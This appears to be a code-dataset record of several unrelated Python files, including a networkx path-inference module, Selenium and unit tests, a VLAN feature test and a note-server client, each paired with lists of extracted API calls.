[((7284, 7313), 'numpy.random.RandomState', 'np.random.RandomState', (['(123456)'], {}), '(123456)\n', (7305, 7313), True, 'import numpy as np\n'), ((2589, 2599), 'a_star_path_finding.AStar', 'pf.AStar', ([], {}), '()\n', (2597, 2599), True, 'import a_star_path_finding as pf\n'), ((5148, 5192), 'numpy.zeros', 'np.zeros', (['(self._size_maze, self._size_maze)'], {}), '((self._size_maze, self._size_maze))\n', (5156, 5192), True, 'import numpy as np\n'), ((5521, 5548), 'numpy.argwhere', 'np.argwhere', (['(self._map == 2)'], {}), '(self._map == 2)\n', (5532, 5548), True, 'import numpy as np\n'), ((5575, 5604), 'numpy.argwhere', 'np.argwhere', (['(self._map == 0.5)'], {}), '(self._map == 0.5)\n', (5586, 5604), True, 'import numpy as np\n'), ((5762, 5778), 'numpy.zeros', 'np.zeros', (['(6, 6)'], {}), '((6, 6))\n', (5770, 5778), True, 'import numpy as np\n'), ((6098, 6114), 'numpy.zeros', 'np.zeros', (['(6, 6)'], {}), '((6, 6))\n', (6106, 6114), True, 'import numpy as np\n'), ((7806, 7829), 'copy.deepcopy', 'copy.deepcopy', (['one_laby'], {}), '(one_laby)\n', (7819, 7829), False, 'import copy\n'), ((5672, 5703), 'numpy.repeat', 'np.repeat', (['self._map', '(6)'], {'axis': '(0)'}), '(self._map, 6, axis=0)\n', (5681, 5703), True, 'import numpy as np\n')]
|
# Functions for Cliques Discovery
import networkx as nx
import logging
import sys
import math
logger = logging.getLogger()
def get_successor_by_freq( traces ):
"""
Get successor pairs in every T in traces, and combine them by frequency of appearance.
>>> T = [ list("ABC"), list("ABCABC") ]
>>> get_successor_pairs_by_freq(T)
{('A', 'B'): 3, ('A', 'C'): 3, ('B', 'C'): 3, ('B', 'A'): 1, ('C', 'A'): 1, ('C', 'B'): 1}
"""
logger = logging.getLogger( sys._getframe().f_code.co_name )
pairs_with_freq = {}
L = float(len(traces))
for trace in traces:
for pair in get_successor_pairs(trace):
if pair in pairs_with_freq.keys():
pairs_with_freq[pair] = pairs_with_freq[pair] + 1.0/L
else:
pairs_with_freq[pair] = 1.0/L
By_freq = {}
for (u, v), freq in pairs_with_freq.items():
f = round(freq,3)
if f in By_freq.keys():
By_freq[f].append( (u,v) )
else:
By_freq[f] =[ (u,v) ]
return By_freq
def get_successor_pairs( T_prime ):
"""
Get near successor pairs
Given the trace $T' = s_1 ... s_L$
For every $1 <= i <= L$ find the maximal subtrace starting at $i$
$T_i_j = s_i ... s_j$ such that $s_i \ne s_k$ for all $i < k <= j$
Return the concatenation for all $T_i_j$
[ (s_i, s_k) ] for all s_i \in T_i_j, s_k \in T_i_j for all i < k <= j
    ADDED 2020-01-23:
    Do not repeat pairs!
>>> get_successor_pairs(list("ABCD"))
[('A', 'B'), ('A', 'C'), ('A', 'D'), ('B', 'C'), ('B', 'D'), ('C', 'D')]
"""
logger = logging.getLogger( sys._getframe().f_code.co_name )
pairs = []
for i in range(0, len(T_prime)-1):
partial_subtrace = T_prime[i:]
s_i = partial_subtrace.pop(0)
L = len(partial_subtrace)
        # Find the first j such that s_i == s_j, or L if it does not exist
        # if s_i in partial_subtrace:
        #     j = partial_subtrace.index(s_i)
        # else:
        #     j = L
        # This is the subtrace T_i_j, the maximal one that does not contain s_i
        T_i_j = partial_subtrace[:]  # Andres 20200124 .. all friends with all, including loops
        T_i_j_pairs = []  # 2020-01-23 BEHAVIOR ... kept, it does not affect the result
# Construct all s_i, s_k , i < k <= j
for s_k in T_i_j:
e = (s_i, s_k)
pairs.append(e) # 2020-01-20 Old BEHAVIOR
logger.debug("Found pairs: %s" % (pairs) )
return pairs
def successorsGraph(successor_by_freq):
G=nx.DiGraph()
for f, pairs in successor_by_freq.items():
for u, v in pairs:
G.add_edge(u, v, weight=f)
return G
# Sort the cliques and apply the rules:
# 1) The nodes of a single path, seen through their successor pairs, have
#    in_degree = 0, 1, 2, ... (e.g. for the path A->B->C within its clique:
#    A has 0, B has 1 and C has 2 incoming edges)
# 2) A path is composed of at least 2 ... 3? nodes
def infer_paths(G_freq, min_clique_size=2):
logger = logging.getLogger( sys._getframe().f_code.co_name )
logger.debug("Received a dict G with f=%s" % G_freq.keys())
paths_f = {}
cliques_f = { f: list(nx.algorithms.clique.find_cliques( G_freq[f].to_undirected() )) for f in G_freq.keys() }
logger.debug("All cliques are %s" % cliques_f)
for f, cliques in cliques_f.items():
# logger.debug("Clique[%d] = %s" % (f, cliques) )
paths = []
for clique in cliques:
logger.debug("F=%d, clique=%s" % (f, clique))
# From the original graph(f),
G_complete = G_freq[f].copy()
# remove the nodes not in this clique
for node in set(G_complete.nodes).difference( set(clique) ):
G_complete.remove_node(node)
# Order nodes by inner degree
nodes = sorted( G_complete.in_degree() , key=lambda p: p[1], reverse=False)
logger.debug("Nodes: %s" % nodes)
# - core - CRITERIA 1 and 2
# Strict checking: in_degree(n) in [0, ... , len(N)-1]
if len(nodes) >=min_clique_size and (
all( [in_degree == i for i, (a, in_degree) in zip(range(0, len(nodes)), nodes)] )
or
all( [in_degree == i+1 for i, (a, in_degree) in zip(range(0, len(nodes)), nodes)] )
):
paths.append ( [ a for a, in_degree in nodes ] )
else:
logger.debug("This clique doesn't match the in_degree critera, or it is too small: %s" % nodes)
if paths:
paths_f[f] = paths
    logger.info("Paths inferred (min_clique_size=%d): %s" % (min_clique_size, paths_f) )
return paths_f
def split_in_freqGraphs( successorsGraph ):
logger = logging.getLogger( sys._getframe().f_code.co_name )
u_v_f = [ (u, v, successorsGraph[u][v]["weight"]) for u, v in successorsGraph.edges]
frqs = set([ f for u, v, f in u_v_f])
logger.debug("freqs found: %s" % frqs)
G={}
for f in frqs:
G[f] = successorsGraph.copy()
        # Remove every edge whose weight != f
for u, v, f2 in u_v_f:
if f != f2:
G[f].remove_edge(u,v)
logger.debug("Nodes in freq=%d: %s" % (f, G[f].nodes) )
logger.debug("About to return a set of G with f=%s" % G.keys())
return G
def remove_loops_in_trace(paths_loop, succ_G):
"""
A loop... should be disjoint with other loops?
I believe YES
"""
logger = logging.getLogger( sys._getframe().f_code.co_name )
loops_found = []
loops_candidates = []
# Look also backwards (it worked!)
for f, paths_f in paths_loop.items():
for path in paths_f:
for p in [ path, list(reversed(path)) ]:
# Magic here
is_a_loop, L = find_loops_in_path(p, succ_G)
if is_a_loop:
if (L,p) not in loops_candidates:
loops_candidates.append( (L,p) )
logger.info("Loop candidate FOUND: repeated %d times in this trace, loop: %s" % (L, p) )
else:
logger.debug("It seems that p is not a loop: %s" % p)
loops_found = loops_candidates
for L, p in loops_found:
# Write correct frequency L for the loop.
for i_u in range(0, len(p)-1):
for i_v in range(i_u + 1, len(p) ):
u, v = p[i_u], p[i_v]
logger.debug("(%s, %s) weight updated from %d to %d" % (u,v,succ_G[u][v]['weight'], L) )
succ_G[u][v]['weight'] = float(L)
# Then remove the back edges from succ_G
# I already stated that the loop is A...Z, then I will remove Z...A
for i_u in range(0, len(p)):
for i_v in range(i_u, len(p)):
logger.debug("Removing %s, %s" % (p[i_v], p[i_u]))
try:
succ_G.remove_edge(p[i_v], p[i_u])
                except nx.NetworkXError:
logger.debug("Hohoho! that pair was already removed")
logger.debug("Removed %s" % list(reversed(p)))
return loops_found, succ_G
def find_loops_in_path(p, succ_G):
"""
With all pairs, if ABC is a loop in pairs of len L then
f(A,B) = f(B,C) = L(L+1)/2 and f(B,A) = f(C,B) = L(L-1)/2
"""
logger = logging.getLogger( sys._getframe().f_code.co_name )
    L = 0
    # Check if p is a loop; a path of fewer than two nodes cannot be one,
    # and is_a_loop must not be reset inside the loop below, otherwise a
    # failing middle pair would be forgotten on the next iteration.
    is_a_loop = len(p) > 1
    logger.debug("Check if p is a loop: %s" % p)
    # setL collects the loop length inferred from every pair; it lives outside
    # the loop so the len(setL) != 1 consistency check below sees all pairs.
    setL = set()
    for a, b in zip(p[:-1], p[1:]):
        if is_a_loop and (b, a) in succ_G.edges() and (a, b) in succ_G.edges():
Wab = succ_G[a][b]['weight'] # also, Wab=f by construction
Wba = succ_G[b][a]['weight']
# Combinatory test:
"""
W1 = (L+1)*L/2.0 = (L^2 + L)/2
W2 = L*(L-1)/2.0 = (L^2 - L)/2
2*W1 = L^2 + L
2*W2 = L^2 - L
2(W1+W2) = 2 L^2
L = sqr(W1+W2) # Integer
"""
L = int( math.sqrt(Wab + Wba) )
Lplus1, Lminus1 = (L+1)*L/2.0, L*(L-1)/2.0
# All lengths L must be equal, therefore the set of L must contains 1 and only 1 element
setL.add(L)
logger.debug( (a, b, Wab, Lplus1, Wba, Lminus1, L ))
# Does it agree with combinatory test?
if Wab != Lplus1 or Wba != Lminus1:
is_a_loop = False
else:
is_a_loop = False
if is_a_loop and len(setL) != 1:
is_a_loop = False
return is_a_loop, L
def remember_loops( loops_this_trace, all_loops ):
# Add loops found in this pair to the loops in all traces
for L,p in loops_this_trace:
pt = tuple(p)
if pt not in all_loops.keys():
all_loops[pt] = float(L)
else:
all_loops[pt] += float(L)
return all_loops
def unentangled_DAG(succ_DAG):
succ_G_acyclic_forReal = nx.DiGraph()
E = succ_DAG.edges()
for u, v in E:
if (v, u) not in E:
succ_G_acyclic_forReal.add_edge(u, v, weight=succ_DAG[u][v]["weight"] )
else:
logger.debug("Removing (%s, %s)" % (u,v))
return succ_G_acyclic_forReal
def combine_DAGs(succ_G_acyclic_forReal, G):
if not G:
G = succ_G_acyclic_forReal.copy()
else:
for u,v in succ_G_acyclic_forReal.edges():
Gw = succ_G_acyclic_forReal[u][v]["weight"]
if (u,v) not in G.edges():
G.add_edge(u, v, weight=Gw)
else:
G[u][v]["weight"] += Gw
return G
def path_graph( weighted_paths ):
def append_path(G, path, weight):
edges = []
previous = path[0]
for node in path[1:]:
edges.append( (previous, node, {"weight": round(weight, 2)} ) )
previous = node
G.add_edges_from(edges)
G = nx.DiGraph()
for w in sorted(weighted_paths, reverse=True):
for path_w in weighted_paths[w]:
append_path( G, path_w, w )
return G
# 2020-01-25
# If both paths (u,z,v) and (u,v) exist, keep just (u,z,v)
def minimally_connected(G):
G_minimal = G.copy()
for u, v in G.edges():
# u has already v, then I will work if I have more than one neighbor
if len(G[u]) > 1:
remove_edge = False
# look if I have a longest u,z,v path
for z, attr in G[u].items():
if z != v and z != u:
if nx.has_path(G_minimal, z, v):
remove_edge = True
if remove_edge:
G_minimal.remove_edge( u, v )
return G_minimal
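
# Minimal usage sketch (not part of the original module): it wires the
# functions above into the intended pipeline. The input traces are hypothetical.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    traces = [list("ABCD"), list("ABCD")]       # two hypothetical traces
    by_freq = get_successor_by_freq(traces)     # successor pairs grouped by frequency
    G = successorsGraph(by_freq)                # one weighted digraph
    G_f = split_in_freqGraphs(G)                # one subgraph per frequency
    paths = infer_paths(G_f)                    # candidate paths per frequency
    print(path_graph(paths).edges(data=True))   # final path graph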
|
[
"math.sqrt",
"sys._getframe",
"networkx.has_path",
"networkx.DiGraph",
"logging.getLogger"
] |
[((104, 123), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (121, 123), False, 'import logging\n'), ((2654, 2666), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (2664, 2666), True, 'import networkx as nx\n'), ((9160, 9172), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (9170, 9172), True, 'import networkx as nx\n'), ((10109, 10121), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (10119, 10121), True, 'import networkx as nx\n'), ((485, 500), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (498, 500), False, 'import sys\n'), ((1675, 1690), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (1688, 1690), False, 'import sys\n'), ((3048, 3063), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (3061, 3063), False, 'import sys\n'), ((4845, 4860), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (4858, 4860), False, 'import sys\n'), ((5585, 5600), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (5598, 5600), False, 'import sys\n'), ((7456, 7471), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (7469, 7471), False, 'import sys\n'), ((8197, 8217), 'math.sqrt', 'math.sqrt', (['(Wab + Wba)'], {}), '(Wab + Wba)\n', (8206, 8217), False, 'import math\n'), ((10724, 10752), 'networkx.has_path', 'nx.has_path', (['G_minimal', 'z', 'v'], {}), '(G_minimal, z, v)\n', (10735, 10752), True, 'import networkx as nx\n')]
|
from .base_testcase import BaseTestCase
import os
import unittest
# needed for the except clause in test_no_submission_grade_inquiry_panel
from selenium.common.exceptions import NoSuchElementException
class TestGradeInquiry(BaseTestCase):
def __init__(self, testname):
super().__init__(testname, log_in=False)
def set_grade_inquiries_for_course(self, allowed):
# ensure that grade inquiries are enabled for the course
self.driver.find_element_by_id("nav-sidebar-course-settings").click()
regrade_enabled_checkbox = self.driver.find_element_by_id("regrade-enabled")
if not regrade_enabled_checkbox.is_selected() and allowed:
regrade_enabled_checkbox.click()
elif regrade_enabled_checkbox.is_selected() and not allowed:
regrade_enabled_checkbox.click()
# navigate back to gradeable page
self.driver.find_element_by_id('nav-sidebar-submitty').click()
def set_grade_inquiries_for_gradeable(self, gradeable_id, date=None, allowed=True):
# ensure that grade inquiries are enabled for grades_released_homework gradeable
self.driver.find_element_by_xpath("//div[@id='"+gradeable_id+"']//*[@name='edit gradeable configuration_button']").click()
if allowed:
self.driver.find_element_by_id("yes_regrade_allowed").click()
else:
self.driver.find_element_by_id("no_regrade_allowed").click()
# set deadline
if date is not None:
self.driver.find_element_by_xpath("//a[text()='Dates']").click()
self.driver.find_element_by_name("regrade_request_date").send_keys(date)
# navigate back to gradeable page
self.driver.find_element_by_id("nav-sidebar-submitty").click()
# TA GRADING INTERFACE TESTS
# travis should not run this
@unittest.skipUnless(os.environ.get('TRAVIS_BUILD_DIR') is None, "cannot run in Travis-CI")
def test_normal_submission_grade_inquiry_panel(self):
gradeable_id = 'grades_released_homework'
grade_inquiry_deadline_date = "9998-01-01 00:00:00"
# login as instructor
self.log_in(user_id='instructor')
self.click_class('sample')
self.set_grade_inquiries_for_course(True)
self.set_grade_inquiries_for_gradeable(gradeable_id, grade_inquiry_deadline_date, allowed=True)
# navigate to TA grading interface of student with normal submission
self.driver.find_element_by_xpath("//div[@id='"+gradeable_id+"']//a[contains(@class,'btn-nav-grade')]").click()
self.driver.find_element_by_xpath("//a[contains(text(),'Grading Index')]").click()
self.driver.find_element_by_xpath("//a[contains(@href,'grading/grade?who_id=bauchg')]").click()
# make sure submit button is present
buttons = self.driver.find_elements_by_xpath("//*[contains(@class,'gi-submit')]")
assert len(buttons) == 1
assert buttons[0].text == "Submit Grade Inquiry"
@unittest.skipUnless(os.environ.get('TRAVIS_BUILD_DIR') is None, "cannot run in Travis-CI")
def test_no_submission_grade_inquiry_panel(self):
gradeable_id = 'grades_released_homework'
# login as instructor
self.log_in(user_id='instructor')
self.click_class('sample')
self.set_grade_inquiries_for_course(True)
self.set_grade_inquiries_for_gradeable(gradeable_id,allowed=True)
# navigate to TA grading interface of student with no submission
self.driver.find_element_by_xpath("//div[@id='"+gradeable_id+"']//a[contains(@class,'btn-nav-grade')]").click()
self.driver.find_element_by_xpath("//a[contains(text(),'Grading Index')]").click()
self.driver.find_element_by_xpath("//a[contains(@href,'grading/grade?who_id=lakinh')]").click()
try:
self.driver.find_element_by_xpath("//div[@id='regrade_info']//*[text()='No Submission']")
except NoSuchElementException:
assert False
assert True
buttons = self.driver.find_elements_by_xpath("//button[contains(@class,'gi-submit')]")
assert len(buttons) == 0
# STUDENT SUBMISSION TESTS
@unittest.skipUnless(os.environ.get('TRAVIS_BUILD_DIR') is None, "cannot run in Travis-CI")
def test_normal_submission_student_grade_inquiry_box(self):
gradeable_id = 'grades_released_homework'
grade_inquiry_deadline_date = "9998-01-01 00:00:00"
self.log_in(user_id='instructor')
self.click_class('sample')
self.set_grade_inquiries_for_course(True)
self.set_grade_inquiries_for_gradeable(gradeable_id,allowed=True)
self.log_out()
self.log_in(user_id='bauchg')
self.click_class('sample')
self.driver.find_element_by_xpath("//div[@id='"+gradeable_id+"']//a[contains(text(),'VIEW GRADE')]").click()
assert not self.driver.find_element_by_id("regradeBoxSection").is_displayed()
open_grade_inquiry_button = self.driver.find_element_by_xpath("//button[contains(text(),'Open Grade Inquiry')]")
open_grade_inquiry_button.click()
assert not open_grade_inquiry_button.is_displayed()
# make sure submit button is present
buttons = self.driver.find_elements_by_xpath("//button[contains(@class,'gi-submit')]")
assert len(buttons) == 1
assert buttons[0].text == "Submit Grade Inquiry"
|
[
"os.environ.get"
] |
[((1722, 1756), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_BUILD_DIR"""'], {}), "('TRAVIS_BUILD_DIR')\n", (1736, 1756), False, 'import os\n'), ((2868, 2902), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_BUILD_DIR"""'], {}), "('TRAVIS_BUILD_DIR')\n", (2882, 2902), False, 'import os\n'), ((4046, 4080), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_BUILD_DIR"""'], {}), "('TRAVIS_BUILD_DIR')\n", (4060, 4080), False, 'import os\n')]
|
import sys
import os
sys.path.append('../')
import unittest
import requests
import datetime
from youtube_api import YoutubeDataApi
from youtube_api import youtube_api_utils as utils
class TestVideo(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.key = os.environ.get('YT_KEY')
cls.yt = YoutubeDataApi(cls.key)
cls.channel_id = 'UC3XTzVzaHQEd30rQbuvCtTQ'
cls.upload_id = 'UU3XTzVzaHQEd30rQbuvCtTQ'
cls.liked_id = 'LL3XTzVzaHQEd30rQbuvCtTQ'
cls.date = '2018-03-14T20:53:14.000Z'
cls.datetime_date = datetime.datetime(2018, 3, 14, 20, 53, 14)
cls.user_url = 'https://www.youtube.com/user/LastWeekTonight'
cls.channel_url = 'https://www.youtube.com/channel/UC3XTzVzaHQEd30rQbuvCtTQ'
cls.video_id = '481YX6T9Xzs'
cls.video_url = 'https://youtube.com/watch?v=481YX6T9Xzs'
def test_get_upload_playlist_id(self):
'''#Written by <NAME> on 11/30/2018'''
resp = utils.get_upload_playlist_id(self.channel_id)
self.assertEqual(resp, self.upload_id)
def test_get_liked_playlist_id(self):
'''#Written by <NAME> on 11/30/2018'''
resp = utils.get_liked_playlist_id(self.channel_id)
self.assertEqual(resp, self.liked_id)
def test_parse_yt_datetime(self):
''' #Verified by <NAME> on 11/30/2018'''
resp = utils.parse_yt_datetime(self.date)
self.assertEqual(resp, self.datetime_date)
def test_strip_video_id_from_url(self):
'''#Verified by <NAME> on 11/30/2018'''
resp = utils.strip_video_id_from_url(self.video_url)
self.assertEqual(resp, self.video_id)
def test_is_user(self):
'''#Verified by <NAME> on 11/30/2018'''
resp = utils.is_user(self.user_url)
self.assertTrue(resp)
resp = utils.is_user(self.channel_url)
self.assertFalse(resp)
def test_get_url_from_video_id(self):
'''#Verified by <NAME> on 11/30/2018'''
resp = utils.get_url_from_video_id(self.video_id)
self.assertEqual(resp, self.video_url)
if __name__ == '__main__':
unittest.main()
|
[
"sys.path.append",
"unittest.main",
"youtube_api.youtube_api_utils.get_upload_playlist_id",
"youtube_api.youtube_api_utils.get_liked_playlist_id",
"datetime.datetime",
"os.environ.get",
"youtube_api.youtube_api_utils.parse_yt_datetime",
"youtube_api.youtube_api_utils.strip_video_id_from_url",
"youtube_api.YoutubeDataApi",
"youtube_api.youtube_api_utils.is_user",
"youtube_api.youtube_api_utils.get_url_from_video_id"
] |
[((21, 43), 'sys.path.append', 'sys.path.append', (['"""../"""'], {}), "('../')\n", (36, 43), False, 'import sys\n'), ((2211, 2226), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2224, 2226), False, 'import unittest\n'), ((281, 305), 'os.environ.get', 'os.environ.get', (['"""YT_KEY"""'], {}), "('YT_KEY')\n", (295, 305), False, 'import os\n'), ((323, 346), 'youtube_api.YoutubeDataApi', 'YoutubeDataApi', (['cls.key'], {}), '(cls.key)\n', (337, 346), False, 'from youtube_api import YoutubeDataApi\n'), ((574, 616), 'datetime.datetime', 'datetime.datetime', (['(2018)', '(3)', '(14)', '(20)', '(53)', '(14)'], {}), '(2018, 3, 14, 20, 53, 14)\n', (591, 616), False, 'import datetime\n'), ((994, 1039), 'youtube_api.youtube_api_utils.get_upload_playlist_id', 'utils.get_upload_playlist_id', (['self.channel_id'], {}), '(self.channel_id)\n', (1022, 1039), True, 'from youtube_api import youtube_api_utils as utils\n'), ((1209, 1253), 'youtube_api.youtube_api_utils.get_liked_playlist_id', 'utils.get_liked_playlist_id', (['self.channel_id'], {}), '(self.channel_id)\n', (1236, 1253), True, 'from youtube_api import youtube_api_utils as utils\n'), ((1412, 1446), 'youtube_api.youtube_api_utils.parse_yt_datetime', 'utils.parse_yt_datetime', (['self.date'], {}), '(self.date)\n', (1435, 1446), True, 'from youtube_api import youtube_api_utils as utils\n'), ((1619, 1664), 'youtube_api.youtube_api_utils.strip_video_id_from_url', 'utils.strip_video_id_from_url', (['self.video_url'], {}), '(self.video_url)\n', (1648, 1664), True, 'from youtube_api import youtube_api_utils as utils\n'), ((1816, 1844), 'youtube_api.youtube_api_utils.is_user', 'utils.is_user', (['self.user_url'], {}), '(self.user_url)\n', (1829, 1844), True, 'from youtube_api import youtube_api_utils as utils\n'), ((1899, 1930), 'youtube_api.youtube_api_utils.is_user', 'utils.is_user', (['self.channel_url'], {}), '(self.channel_url)\n', (1912, 1930), True, 'from youtube_api import youtube_api_utils as utils\n'), ((2081, 2123), 'youtube_api.youtube_api_utils.get_url_from_video_id', 'utils.get_url_from_video_id', (['self.video_id'], {}), '(self.video_id)\n', (2108, 2123), True, 'from youtube_api import youtube_api_utils as utils\n')]
|
import unittest
import mock
from lxml import etree
from ncclient.operations.retrieve import GetReply
from pyhpecw7.features.vlan import Vlan
from pyhpecw7.features.errors import VlanIDError, LengthOfStringError
from base_feature_test import BaseFeatureCase
class VlanTestCase(BaseFeatureCase):
@mock.patch('pyhpecw7.comware.HPCOM7')
def setUp(self, mock_device):
self.device = mock_device
self.vlan = Vlan(self.device, vlanid='77')
def test_get_vlan_list(self):
expected_get, get_reply = self.xml_get_and_reply('vlan_list')
self.device.get.return_value = get_reply
expected = ['1', '20', '77']
vlan_list = self.vlan.get_vlan_list()
self.assertEqual(vlan_list, expected)
self.assert_get_request(expected_get)
def test_get_config(self):
expected_get, get_reply = self.xml_get_and_reply('vlan')
self.device.get.return_value = get_reply
expected = {'name': 'hello', 'vlanid': '77', 'descr': 'goodbye'}
vlan = self.vlan.get_config()
self.assertEqual(vlan, expected)
self.assert_get_request(expected_get)
def test_build_config(self):
result = self.vlan._build_config(state='present')
expected = self.read_config_xml('vlan')
self.assert_elements_equal(result, expected)
result = self.vlan._build_config(state='present', name='hello')
expected = self.read_config_xml('vlan_name')
self.assert_elements_equal(result, expected)
result = self.vlan._build_config('present', name='hello', descr='goodbye')
expected = self.read_config_xml('vlan_name_descr')
self.assert_elements_equal(result, expected)
result = self.vlan._build_config('absent')
expected = self.read_config_xml('vlan_absent')
self.assert_elements_equal(result, expected)
def test_param_check(self):
with self.assertRaises(LengthOfStringError):
self.vlan.param_check(name=('a' * 255))
with self.assertRaises(LengthOfStringError):
self.vlan.param_check(descr=('b' * 255))
@mock.patch.object(Vlan, '_build_config')
def test_build(self, mock_build_config):
self.vlan.build(name='a', descr='b')
mock_build_config.assert_called_with(state='present', name='a', descr='b')
self.device.edit_config.assert_called_with(mock_build_config.return_value)
self.vlan.build(stage=False, name='a', descr='b')
mock_build_config.assert_called_with(state='present', name='a', descr='b')
self.device.edit_config.assert_called_with(mock_build_config.return_value)
self.vlan.build(stage=True, name='a', descr='b')
mock_build_config.assert_called_with(state='present', name='a', descr='b')
self.device.stage_config.assert_called_with(mock_build_config.return_value, 'edit_config')
@mock.patch.object(Vlan, '_build_config')
def test_remove(self, mock_build_config):
self.vlan.remove()
mock_build_config.assert_called_with(state='absent')
self.device.edit_config.assert_called_with(mock_build_config.return_value)
self.vlan.remove(stage=False)
mock_build_config.assert_called_with(state='absent')
self.device.edit_config.assert_called_with(mock_build_config.return_value)
self.vlan.remove(stage=True)
mock_build_config.assert_called_with(state='absent')
self.device.stage_config.assert_called_with(mock_build_config.return_value, 'edit_config')
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"mock.patch.object",
"pyhpecw7.features.vlan.Vlan",
"mock.patch"
] |
[((303, 340), 'mock.patch', 'mock.patch', (['"""pyhpecw7.comware.HPCOM7"""'], {}), "('pyhpecw7.comware.HPCOM7')\n", (313, 340), False, 'import mock\n'), ((2118, 2158), 'mock.patch.object', 'mock.patch.object', (['Vlan', '"""_build_config"""'], {}), "(Vlan, '_build_config')\n", (2135, 2158), False, 'import mock\n'), ((2886, 2926), 'mock.patch.object', 'mock.patch.object', (['Vlan', '"""_build_config"""'], {}), "(Vlan, '_build_config')\n", (2903, 2926), False, 'import mock\n'), ((3558, 3573), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3571, 3573), False, 'import unittest\n'), ((429, 459), 'pyhpecw7.features.vlan.Vlan', 'Vlan', (['self.device'], {'vlanid': '"""77"""'}), "(self.device, vlanid='77')\n", (433, 459), False, 'from pyhpecw7.features.vlan import Vlan\n')]
|
import datetime
print(datetime.datetime.now().hour)
import time
timestamp = time.strftime('%H')
print(int(timestamp))
|
[
"datetime.datetime.now",
"time.strftime"
] |
[((79, 98), 'time.strftime', 'time.strftime', (['"""%H"""'], {}), "('%H')\n", (92, 98), False, 'import time\n'), ((24, 47), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (45, 47), False, 'import datetime\n')]
|
from concurrent.futures import ThreadPoolExecutor
import requests
import json
class AServerError(Exception):
pass
def raise_for_status(response):
try:
response.raise_for_status()
except Exception as e:
raise AServerError(e)
class AServerConnection:
def __init__(self, server, password):
self.endpoint = '{}/note'.format(server)
self.headers = {
'auth': password,
'User-Agent': 'A-Server Themral Printer 0.1'
}
self.executor = ThreadPoolExecutor()
@staticmethod
def _parse_response(response):
raise_for_status(response)
parsed_body = response.json()
try:
return parsed_body['file']
except KeyError:
raise AServerError(
'Malformed body. Expected key: "file", found: {}'.format(parsed_body)
)
def read(self):
response = requests.get(self.endpoint, headers=self.headers)
return self._parse_response(response)
def futures_read(self):
return self.executor.submit(self.read)
def write(self, note):
response = requests.post(
self.endpoint,
headers=self.headers,
data=json.dumps({'file': note})
)
return self._parse_response(response)
def futures_write(self, note):
return self.executor.submit(self.write, note)
def cleanup(self):
self.executor.shutdown()
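# A hedged usage sketch, not from the original source: the server URL and
# password below are illustrative placeholders.
if __name__ == '__main__':
    conn = AServerConnection('http://example.invalid', 'hunter2')
    future = conn.futures_write('hello, printer')
    print(future.result())  # the server is expected to echo the stored note
    conn.cleanup()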
|
[
"concurrent.futures.ThreadPoolExecutor",
"requests.get",
"json.dumps"
] |
[((517, 537), 'concurrent.futures.ThreadPoolExecutor', 'ThreadPoolExecutor', ([], {}), '()\n', (535, 537), False, 'from concurrent.futures import ThreadPoolExecutor\n'), ((915, 964), 'requests.get', 'requests.get', (['self.endpoint'], {'headers': 'self.headers'}), '(self.endpoint, headers=self.headers)\n', (927, 964), False, 'import requests\n'), ((1227, 1253), 'json.dumps', 'json.dumps', (["{'file': note}"], {}), "({'file': note})\n", (1237, 1253), False, 'import json\n')]
|
# Copyright (c) 2017, MD2K Center of Excellence
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import List
from uuid import UUID
from cerebralcortex.kernel.datatypes.datapoint import DataPoint
from cerebralcortex.kernel.datatypes.subtypes import StreamReference, DataDescriptor, ExecutionContext
class Stream:
def __init__(self,
identifier: UUID = None,
owner: UUID = None,
name: UUID = None,
description: str = None,
data_descriptor: List[DataDescriptor] = None,
execution_context: ExecutionContext = None,
annotations: List[StreamReference] = None,
data: List[DataPoint] = None
):
self._identifier = identifier
self._owner = owner
self._name = name
self._description = description
self._data_descriptor = data_descriptor
self._datastream_type = None
self._execution_context = execution_context
self._annotations = annotations
self._data = data
def find_annotation_references(self, identifier: int = None, name: str = None):
result = self._annotations
found = False
if identifier:
found = True
result = [a for a in result if a.stream_identifier == identifier]
if name:
found = True
result = [a for a in result if a.name == name]
if not found:
return []
return result
@property
def annotations(self):
return self._annotations
@annotations.setter
def annotations(self, value):
self._annotations = value
@property
def identifier(self):
